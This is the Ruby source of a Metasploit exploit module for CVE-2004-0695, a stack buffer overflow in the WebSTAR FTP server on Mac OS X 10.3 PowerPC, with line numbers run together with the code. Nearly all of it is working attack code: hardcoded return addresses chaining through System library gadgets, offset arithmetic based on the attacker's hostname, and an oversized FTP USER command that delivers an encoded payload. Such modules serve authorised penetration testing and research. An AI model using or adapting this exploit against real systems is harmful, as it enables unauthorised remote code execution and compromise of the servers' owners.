Path: blob/master/modules/exploits/osx/ftp/webstar_ftp_user.rb
19512 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = AverageRanking78include Msf::Exploit::Remote::Ftp910def initialize(info = {})11super(12update_info(13info,14'Name' => 'WebSTAR FTP Server USER Overflow',15'Description' => %q{16This module exploits a stack buffer overflow in the logging routine17of the WebSTAR FTP server. Reliable code execution is18obtained by a series of hops through the System library.19},20'Author' => [ 'ddz', 'hdm' ],21'License' => MSF_LICENSE,22'References' => [23[ 'CVE', '2004-0695'],24[ 'OSVDB', '7794'],25[ 'BID', '10720'],2627],28'Privileged' => true,29'Payload' => {30'Space' => 300,31'BadChars' => "\x00\x20\x0a\x0d",32'Compat' =>33{34'ConnectionType' => "+find"35},36},37'Platform' => %w{osx},38'Targets' => [39[40'Mac OS X 10.3.4-10.3.6',41{42'Platform' => 'osx',43'Arch' => ARCH_PPC,44'Rets' => [ 0x9008dce0, 0x90034d60, 0x900ca6d8, 0x90023590 ],45},46],47],48'DisclosureDate' => '2004-07-13',49'DefaultTarget' => 0,50'Notes' => {51'Reliability' => UNKNOWN_RELIABILITY,52'Stability' => UNKNOWN_STABILITY,53'SideEffects' => UNKNOWN_SIDE_EFFECTS54}55)56)5758register_options(59[60OptString.new('MHOST', [ false, "Our IP address or hostname as the target resolves it" ]),61], self62)63end6465# crazy dino 5-hop foo66# $ret = pack('N', 0x9008dce0); # call $r28, jump r1+12067# $r28 = pack('N', 0x90034d60); # getgid()68# $ptr = pack('N', 0x900ca6d8); # r3 = r1 + 64, call $r3069# $r30 = pack('N', 0x90023590); # call $r37071def exploit72connect7374# The offset to the return address is dependent on the length of our hostname75# as the target system resolves it ( IP or reverse DNS ).76mhost = datastore['MHOST'] || Rex::Socket.source_address(datastore['RHOST'])77basel = 285 - mhost.length7879print_status("Trying target #{target.name}...")8081# ret = 29682# r25 = 26083# r26 = 26484# r27 = 26885# r28 = 27286# r29 = 27687# r30 = 28088# r31 = 2848990# r1+120 = 4089192buf = rand_text_alphanumeric(basel + 136 + 56, payload_badchars)93buf[basel + 24, 4] = [ target['Rets'][0] ].pack('N') # call $r28, jump r1+12094buf[basel, 4] = [ target['Rets'][1] ].pack('N') # getgid()95buf[basel + 136, 4] = [ target['Rets'][2] ].pack('N') # (r1+120) => r3 = r1 + 64, call $r3096buf[basel + 120, 4] = [ target['Rets'][3] ].pack('N') # call $r397buf << payload.encoded9899send_cmd(['USER', buf], true)100send_cmd(['HELP'], true)101102handler103disconnect104end105end106107108